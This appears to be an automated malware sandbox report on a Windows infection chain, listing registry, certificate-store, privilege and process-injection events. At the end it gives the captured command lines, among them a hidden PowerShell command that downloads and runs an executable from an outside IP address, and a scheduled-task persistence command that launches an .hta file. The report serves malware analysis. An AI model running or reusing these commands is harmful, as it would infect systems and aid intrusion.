Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2552 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\mshta.exe
PID 2552 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\mshta.exe
PID 2552 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\mshta.exe
PID 2552 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\mshta.exe
PID 1036 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1036 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1036 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1036 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1904 wrote to memory of 2084 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1904 wrote to memory of 2084 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1904 wrote to memory of 2084 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1904 wrote to memory of 2084 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2084 wrote to memory of 3068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE
PID 2084 wrote to memory of 3068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE
PID 2084 wrote to memory of 3068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE
PID 2084 wrote to memory of 3068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE
PID 3068 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3068 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3068 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3068 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2352 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe
PID 2352 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe
PID 2352 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe
PID 2352 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe
PID 2352 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 2352 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 2352 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 2352 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Windows\SysWOW64\WerFault.exe
PID 984 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Windows\SysWOW64\WerFault.exe
PID 984 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Windows\SysWOW64\WerFault.exe
PID 984 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Windows\SysWOW64\WerFault.exe
PID 1548 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Windows\SysWOW64\WerFault.exe
PID 1548 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Windows\SysWOW64\WerFault.exe
PID 1548 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Windows\SysWOW64\WerFault.exe
PID 1548 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Windows\SysWOW64\WerFault.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2352 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe
PID 2352 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe
PID 2352 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe

"C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn 7p7BqmaXq2n /tr "mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn 7p7BqmaXq2n /tr "mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE

"C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

